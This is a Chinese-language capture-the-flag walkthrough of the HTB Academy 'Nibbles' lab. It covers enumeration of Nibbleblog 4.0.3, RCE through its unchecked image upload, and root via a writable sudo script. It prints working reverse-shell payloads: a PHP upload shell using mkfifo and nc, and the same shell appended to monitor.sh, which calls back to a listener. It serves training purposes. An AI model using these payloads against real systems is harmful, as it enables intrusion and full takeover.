# Nibbles ###### tags: `HTB ACADEMY GETTING STARTED`! ## step1. Information Enumeration ``` nmap -sC -sV 10.129.66.130 ```  只有發現80和22端口 ## step2. Exploit 首頁打開只有行文字,查看註解之後發現有個資料夾可以看看  ``` https://10.129.66.130/nibbleblog ```  ### 目錄爆破 ``` gobuster dir -u http://10.129.66.130/nibbleblog/ -w /usr/share/wordlists/dirb/common.txt ```  ``` http://10.129.66.130/nibbleblog/README ```  #### Nibbleblog v4.0.3 [NibbleBlog 4.0.3: Code Execution](https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html) 漏洞概述: Nibbleblog v4.0.3 預設安裝 "My image"外掛,它不會檢查副檔名,因此可以執行PHP[(RCE漏洞)](https://cloud.tencent.com/developer/article/1668900),進而達成CSRF攻擊。前提是需要先登入後台取得管理員權限。 ### 網站後台 ``` admin/nibbles ```  找到"My image"外掛,上傳poc然後點擊 image.php 執行它 ``` poc:<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack ip> <attack port> >/tmp/f"); ?> ```   ``` 監聽: nc -nvlp <attack port> ```  ### 成功拿下user權限 ## step3. Privilege escalation sudo -l :找到一個moniror.sh 擁有root權限 這邊看起來是一個bash腳本,可以使用echo寫入攻擊代碼  ``` poc:echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack ip> <attack port> >/tmp/f' | tee -a /home/nibbler/personal/stuff/monitor.sh ```  如果不確定有沒有寫入成功可以使用cat檢查看看 如果是成功寫入的文件末端是長這樣  會多出這一樣 ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.152 9443 >/tmp/f ``` ``` sudo personal/stuff/monitor.sh ```  ``` nc -nvlp 9443 ```  ### 成功取得root權限 --- ``` 可以知道 '使用者'@'機器':'路徑' 的指令 python3 -c 'import pty; pty.spawn("/bin/bash")' ``` 
×
Sign in
Email
Password
Forgot password
or
Sign in via Google
Sign in via Facebook
Sign in via X(Twitter)
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
Continue with a different method
New to HackMD?
Sign up
By signing in, you agree to our
terms of service
.